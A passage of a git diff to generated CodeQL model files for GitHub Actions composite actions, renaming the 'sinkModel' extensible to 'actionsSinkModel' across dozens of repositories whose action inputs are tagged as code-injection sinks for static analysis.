a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml index c2e56f7e175c..8c1993c47ca6 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["awslabs/aws-lambda-rust-runtime", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml index 54d0c8b2fe09..ee0adaadb3e2 100644 --- a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml +++ b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azerothcore/azerothcore-wotlk", "*", "input.CXX", "code-injection", "generated"] - ["azerothcore/azerothcore-wotlk", "*", "input.CC", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml index b1914e7a96b5..c127f03bb66d 100644 --- a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml +++ b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azure/azure-datafactory", "*", "input.directory", "code-injection", "generated"] - ["azure/azure-datafactory", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml index dd66f206ee99..3b3d60fadd03 100644 --- a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml +++ b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["badges/shields", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml index 0c26f02e6d86..4dd43acd2c53 100644 --- a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["balena-io/etcher", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml index 2ee13115d6d9..cb4bff25f9ac 100644 --- a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["balena-os/balena-engine", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml index c76ed5b66045..39a204389b99 100644 --- a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml +++ b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ben-manes/caffeine", "*", "input.attempt-delay", "code-injection", "generated"] - ["ben-manes/caffeine", "*", "input.attempt-limit", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml index 0bdf2087b46a..6b4192c0c616 100644 --- a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml +++ b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bokeh/bokeh", "*", "input.test-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml index bb83a5964e7c..63c3fc89058b 100644 --- a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml +++ b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["botpress/botpress", "*", "input.tilt_cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml index f29c52b1bf5b..72772ae47cf7 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["braintree/braintree-android-drop-in", "*", "input.version", "code-injection", "generated"] - ["braintree/braintree-android-drop-in", "*", "input.signing_file_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml index 43745006f8db..43cc1e0187ea 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["braintree/braintree/android", "*", "input.version", "code-injection", "generated"] - ["braintree/braintree/android", "*", "input.module", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml index 9289afb744f9..7c80b7e6eda6 100644 --- a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml +++ b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["broadinstitute/gatk", "*", "input.identifier", "code-injection", "generated"] - ["broadinstitute/gatk", "*", "input.repo-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml index 9729f9668138..1f7b69e6254a 100644 --- a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml +++ b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["canonical/multipass", "*", "input.release-tag-re", "code-injection", "generated"] - ["canonical/multipass", "*", "input.release-branch-re", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml index 92c259539443..7879a7903b41 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chia-network/actions", "*", "input.keypair_path", "code-injection", "generated"] - ["chia-network/actions", "*", "input.role_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml index c572c11ada4b..dbbd4c720ca4 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chia-network/chia-blockchain", "*", "input.command-prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml index 1819f4f716e1..f99698b19924 100644 --- a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chipsalliance/chisel", "*", "input.version", "code-injection", "generated"] - ["chipsalliance/chisel", "*", "input.file-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml index 620100dd2d9a..a98a135d6b43 100644 --- a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml +++ b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chocobozzz/peertube", "*", "input.deployKey", "code-injection", "generated"] - ["chocobozzz/peertube", "*", "input.knownHosts", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml index dfb08d260583..3ebb5e7acb32 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cilium/cilium-cli", "*", "input.binary-name", "code-injection", "generated"] - ["cilium/cilium-cli", "*", "input.binary-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml index a99ccc9e4776..b26aa6ea48b3 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cilium/cilium", "*", "input.job-name", "code-injection", "generated"] - ["cilium/cilium", "*", "input.lb-acceleration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml index 3a1e7b9d3366..683965e13d20 100644 --- a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml +++ b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["citusdata/citus", "*", "input.flags", "code-injection", "generated"] - ["citusdata/citus", "*", "input.pg_major", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml index c15c1fac0068..9358c895f3c2 100644 --- a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml +++ b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["clerk/javascript", "*", "input.auth-email", "code-injection", "generated"] - ["clerk/javascript", "*", "input.auth-password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml index b0c787fa378f..8233e5066033 100644 --- a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloud-custodian/cloud-custodian", "*", "input.poetry-version", "code-injection", "generated"] - ["cloud-custodian/cloud-custodian", "*", "input.bucket-url", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml index 86278889fdf1..2aea730db7e3 100644 --- a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloudflare/workers-sdk", "*", "input.package-manager", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml index 4bf92a251235..b03d23918825 100644 --- a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloudfoundry/cloud_controller/ng", "*", "input.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml index 79c13504faba..9db70f02db4e 100644 --- a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml +++ b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["coder/coder", "*", "input.api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml index 45ac61c8ef9d..8cea15ac9e11 100644 --- a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml +++ b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["coil-kt/coil", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml index ce546fceb4bb..766ec5155517 100644 --- a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml +++ b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["commaai/openpilot", "*", "input.sleep_time", "code-injection", "generated"] - ["commaai/openpilot", "*", "input.docker_hub_pat", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml index b34c6d46da3a..13ee2f4e7a87 100644 --- a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml +++ b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["conan-io/conan-center-index", "*", "input.files", "code-injection", "generated"] - ["conan-io/conan-center-index", "*", "input.reviewers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml index f87e0c02529c..0cf05c2273bd 100644 --- a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml +++ b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["corretto/corretto-8", "*", "input.version-branch", "code-injection", "generated"] - ["corretto/corretto-8", "*", "input.upstream", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml index 88348f05cd0d..7f2622feecd8 100644 --- a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cosmos/cosmos-sdk", "*", "input.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml index 76fe3bed4729..3aa8c3bc6495 100644 --- a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml +++ b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["coturn/coturn", "*", "input.SUDO", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml index bf1a498d7a08..b79317db9c8a 100644 --- a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["crunchydata/postgres-operator", "*", "input.k3s-channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml index b985d87f7e19..843e0d20b98a 100644 --- a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml +++ b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cvc5/cvc5", "*", "input.build-dir", "code-injection", "generated"] - ["cvc5/cvc5", "*", "input.macos-target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml index 8e7cdd0308c9..2a0fd3ac371d 100644 --- a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml +++ b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["d2l-ai/d2l-en", "*", "input.command", "code-injection", "generated"] - ["d2l-ai/d2l-en", "*", "input.work-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml index cf30d0d19ccc..3ef29cc9b84f 100644 --- a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["danysk/build-check-deploy-gradle-action", "*", "input.clean-command", "code-injection", "generated"] - ["danysk/build-check-deploy-gradle-action", "*", "input.deploy-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml index 5414a755179c..71d2012eb029 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-dotnet", "*", "input.command", "code-injection", "generated"] - ["datadog/dd-trace-dotnet", "*", "input.baseImage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml index 97a3bfa026e1..a67aeb905958 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-go", "*", "input.files", "code-injection", "generated"] - ["datadog/dd-trace-go", "*", "input.tags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml index 81672e855578..1f5dd108f910 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-js", "*", "input.container-id", "code-injection", "generated"] - ["datadog/dd-trace-js", "*", "input.init-image-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml index b4fdfaf273df..ea4a2a2a3c76 100644 --- a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datafuselabs/databend", "*", "input.dataset", "code-injection", "generated"] - ["datafuselabs/databend", "*", "input.dirs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml index 6f1043073d8e..29973ccdbd74 100644 --- a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml +++ b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["davatorium/rofi", "*", "input.logfile", "code-injection", "generated"] - ["davatorium/rofi", "*", "input.windowmode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml index f9244c448580..2db70ffea663 100644 --- a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml +++ b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["debezium/debezium", "*", "input.path-core", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml index 36332c5678d4..8a4273e8cafd 100644 --- a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml +++ b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["defenseunicorns/zarf", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml index c246e5de06f6..de09b35f1d46 100644 --- a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml +++ b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "input.results_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml index 13c0093fe4ac..91e6268e6140 100644 --- a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml +++ b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["department-of-veterans-affairs/vets-website", "*", "input.delimiter", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml index 49b226de1e80..777212d9a0a6 100644 --- a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml +++ b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["devexpress/devextreme", "*", "input.name", "code-injection", "generated"] - ["devexpress/devextreme", "*", "input.result", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml index 9a6e0b88ba2c..8cc0ab83a420 100644 --- a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml +++ b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["diggerhq/digger", "*", "input.checkov-version", "code-injection", "generated"] - ["diggerhq/digger", "*", "input.google-auth-credentials", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml index 4f88855a5616..f1244bdd5dec 100644 --- a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml +++ b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["diku-dk/futhark", "*", "input.script", "code-injection", "generated"] - ["diku-dk/futhark", "*", "input.slurm-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml index 5683d28567f4..37814510c8c4 100644 --- a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml +++ b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["discourse/.github", "*", "input.about_json_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml index 424c7241bcfc..48e40c36beaa 100644 --- a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml +++ b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dnsjava/dnsjava", "*", "input.name", "code-injection", "generated"] - ["dnsjava/dnsjava", "*", "input.filename", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml index 37295f2cf6c0..0edb2c5f8cdc 100644 --- 